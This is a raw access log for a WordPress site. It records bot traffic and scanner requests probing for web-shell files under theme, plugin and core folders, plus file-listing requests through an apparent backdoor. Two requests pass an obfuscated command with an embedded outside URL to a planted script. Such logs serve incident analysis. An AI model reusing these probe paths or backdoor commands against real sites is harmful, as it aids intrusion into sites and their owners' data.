172.71.110.163 - - [06/Dec/2025:03:30:18 +0100] "GET /autoload_classmap/function.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:19 +0100] "GET /av.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
108.162.238.43 - - [06/Dec/2025:03:30:19 +0100] "GET /?f=3538613418 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:20 +0100] "GET /bless.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
104.23.239.81 - - [06/Dec/2025:03:30:20 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/colorpicker.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 41445 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
104.22.1.32 - - [06/Dec/2025:03:30:20 +0100] "GET /?f=3827668673 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:21 +0100] "GET /buy.php HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:22 +0100] "GET /cc.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:22 +0100] "GET /chosen.php HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.23.245.113 - - [06/Dec/2025:03:30:23 +0100] "GET /?f=566505021 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:23 +0100] "GET /css/index.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.144.17 - - [06/Dec/2025:03:30:24 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/comment-reply.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 29479 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:25 +0100] "GET /css/install.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:25 +0100] "GET /elp.php HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.22.1.32 - - [06/Dec/2025:03:30:25 +0100] "GET /?o=35661390011730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:26 +0100] "GET /file5.php HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.23.245.113 - - [06/Dec/2025:03:30:26 +0100] "GET /?f=3145636204 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:27 +0100] "GET /function/function.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:28 +0100] "GET /goods.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.127.118 - - [06/Dec/2025:03:30:28 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/comment-reply.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 20066 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:29 +0100] "GET /images/admin.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:30 +0100] "GET /index/function.php HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.30.99 - - [06/Dec/2025:03:30:30 +0100] "GET /?f=3695539489 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:31 +0100] "GET /inputs.php HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.69.150.88 - - [06/Dec/2025:03:30:32 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-base.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 42973 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:32 +0100] "GET /install.php HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:33 +0100] "GET /mah/function.php HTTP/1.0" 200 63847 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:34 +0100] "GET /manager.php HTTP/1.0" 403 4415 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:35 +0100] "GET /mini.php HTTP/1.0" 403 4415 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.148.157 - - [06/Dec/2025:03:30:36 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-base.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 24923 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
104.22.1.32 - - [06/Dec/2025:03:30:36 +0100] "GET /?f=2191781151 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:36 +0100] "GET /network.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.22.117 - - [06/Dec/2025:03:30:37 +0100] "GET /?f=2871464349 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:38 +0100] "GET /options-reading.php HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.144.17 - - [06/Dec/2025:03:28:39 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939313731392p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938383131392q6462336630303636326163656561633237343862383434316337663631636166222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.172.202 - - [06/Dec/2025:03:30:39 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-loader.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 24845 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:40 +0100] "GET /simple.php HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:42 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/as.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
162.159.106.43 - - [06/Dec/2025:03:30:42 +0100] "GET /?f=3492918918 HTTP/1.0" 200 214767 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.110.163 - - [06/Dec/2025:03:30:43 +0100] "GET /wp-admin/css/colors/ocean/about.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.144.17 - - [06/Dec/2025:03:30:43 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-loader.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 20501 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.30.99 - - [06/Dec/2025:03:30:44 +0100] "GET /?o=104832868021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:44 +0100] "GET /wp-admin/images/index.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.22.117 - - [06/Dec/2025:03:30:44 +0100] "GET /?o=60951832011730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:45 +0100] "GET /wp-admin/includes/index.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.22.1.32 - - [06/Dec/2025:03:30:45 +0100] "GET /?o=301581021730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:46 +0100] "GET /wp-admin/network/admin.php HTTP/1.0" 200 68158 "https://duckduckgo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:47 +0100] "GET /wp-admin/network/index.php HTTP/1.0" 200 68158 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:47 +0100] "GET /wp-blog.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.148.157 - - [06/Dec/2025:03:30:47 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-models.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 23881 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:50 +0100] "GET /wp-content/classwithtostring.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:50 +0100] "GET /wp-content/edit.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.148.157 - - [06/Dec/2025:03:30:51 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-models.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 20785 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
108.162.238.43 - - [06/Dec/2025:03:30:52 +0100] "GET /?f=3569061219 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:52 +0100] "GET /wp-content/index.php HTTP/1.0" 200 3509 "https://duckduckgo.com/" "Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:53 +0100] "GET /wp-content/languages/index.php HTTP/1.0" 200 63847 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:54 +0100] "GET /wp-content/plugins/admin.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Mobile Safari/537.36"
172.71.144.17 - - [06/Dec/2025:03:30:55 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-preview-nav-menus.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 31869 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.30.99 - - [06/Dec/2025:03:30:55 +0100] "GET /?f=482205513 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.69.71.184 - - [06/Dec/2025:03:30:55 +0100] "GET /?o=61251298121730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:55 +0100] "GET /wp-content/themes/pridmag/install.php?u HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.22.1.32 - - [06/Dec/2025:03:30:56 +0100] "GET /?o=58238770001730 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:30:56 +0100] "GET /wp-content/themes/tflow/as.php HTTP/1.0" 200 63847 "https://www.google.fr/" "Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.110.163 - - [06/Dec/2025:03:30:57 +0100] "GET /wp-content/themes/twentytwentyfour/system_cache.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.110.163 - - [06/Dec/2025:03:30:58 +0100] "GET /wp-content/themes/twentytwentythree/patterns/index.php HTTP/1.0" 200 63847 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
108.162.238.43 - - [06/Dec/2025:03:30:59 +0100] "GET /?f=2026651426 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
104.23.229.54 - - [06/Dec/2025:03:30:59 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-preview-nav-menus.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 21995 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:30:59 +0100] "GET /wp-editor.php HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36"
172.71.172.202 - - [06/Dec/2025:03:29:00 +0100] "GET /wp-includes/js/tinymce/plugins/paste/paste/index.php?ARRAY=7o2230223n313736343939313734302p2231223n22687474703n5p2s5p2s7n7336393176313361732r6q616465742r636p75625p2s3s6p633q7068705s636s64655s6n6326743q313736343938383134302q6238616430346231313965306366376536323866636430323666373864393237222p2232223n226363303666303238663863613535346536613830383962343332343335303466222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231332q35302q35392q36362q37382q38372q3139227q HTTP/1.0" 503 4548 "-" "-"
172.71.110.163 - - [06/Dec/2025:03:31:00 +0100] "GET /wp-good.php HTTP/1.0" 403 4415 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1"
172.71.30.99 - - [06/Dec/2025:03:31:00 +0100] "GET /?f=3706899029 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.22.117 - - [06/Dec/2025:03:31:00 +0100] "GET /?f=3771453255 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:01 +0100] "GET /wp-includes/ID3/about.php HTTP/1.0" 403 4415 "https://www.google.co.uk/" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1"
104.23.245.113 - - [06/Dec/2025:03:31:01 +0100] "GET /?f=2139621077 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:02 +0100] "GET /wp-includes/ID3/about.php/wp-content/x/index.php HTTP/1.0" 403 4415 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.68.70.196 - - [06/Dec/2025:03:31:02 +0100] "GET /?f=3882454821 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:02 +0100] "GET /wp-includes/ID3/simi.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 12; 2201116SG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.127.118 - - [06/Dec/2025:03:31:02 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-preview-widgets.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 40510 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:31:03 +0100] "GET /wp-includes/PHPMailer/index.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
108.162.238.43 - - [06/Dec/2025:03:31:03 +0100] "GET /?f=3821228242 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:05 +0100] "GET /wp-includes/Requests/about.php HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
172.71.30.99 - - [06/Dec/2025:03:31:05 +0100] "GET /?f=2578597646 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.68.70.196 - - [06/Dec/2025:03:31:05 +0100] "GET /?f=646820296 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:06 +0100] "GET /wp-includes/SimplePie/index.php HTTP/1.0" 200 63847 "https://www.bing.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
104.22.1.32 - - [06/Dec/2025:03:31:06 +0100] "GET /?f=4129060334 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
162.158.95.109 - - [06/Dec/2025:03:31:06 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-preview.min.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 29501 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.30.99 - - [06/Dec/2025:03:31:06 +0100] "GET /?f=3509357225 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:07 +0100] "GET /wp-includes/Text/Diff/Renderer/index.php HTTP/1.0" 200 63847 "https://www.google.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
108.162.238.43 - - [06/Dec/2025:03:31:07 +0100] "GET /?f=2021556899 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.30.99 - - [06/Dec/2025:03:31:08 +0100] "GET /?f=1066040716 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:08 +0100] "GET /wp-includes/Text/Diff/index.php HTTP/1.0" 200 63847 "https://www.google.co.uk/" "Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.71.30.99 - - [06/Dec/2025:03:31:09 +0100] "GET /?f=3250719504 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:09 +0100] "GET /wp-includes/Text/index.php HTTP/1.0" 200 63847 "https://www.google.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
172.71.110.163 - - [06/Dec/2025:03:31:10 +0100] "GET /wp-includes/Text/xwx1.php HTTP/1.0" 403 4415 "https://duckduckgo.com/" "Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
162.158.110.164 - - [06/Dec/2025:03:31:10 +0100] "GET /?fileloc=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js/customize-selective-refresh.js&path=/var/www/vhosts/iphonesused.com/httpdocs/wp-includes/js HTTP/1.0" 200 50962 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
172.71.110.163 - - [06/Dec/2025:03:31:11 +0100] "GET /wp-includes/assets/about.php HTTP/1.0" 403 4415 "https://www.yahoo.com/" "Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
172.69.71.184 - - [06/Dec/2025:03:31:12 +0100] "GET /?f=3386685778 HTTP/1.0" 200 63847 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
172.71.110.163 - - [06/Dec/2025:03:31:12 +0100] "GET /wp-includes/assets/index.php HTTP/1.0" 200 63847 "https://www.google.de/" "Mozilla/5.0 (Linux; Android 11; CPH2251) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36"
104.23.175.106 - - [06/Dec/2025:03:31:13 +0100] "GET /?f=1802652526 HTTP/1.0" 200 63847 "https://iphonesused.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
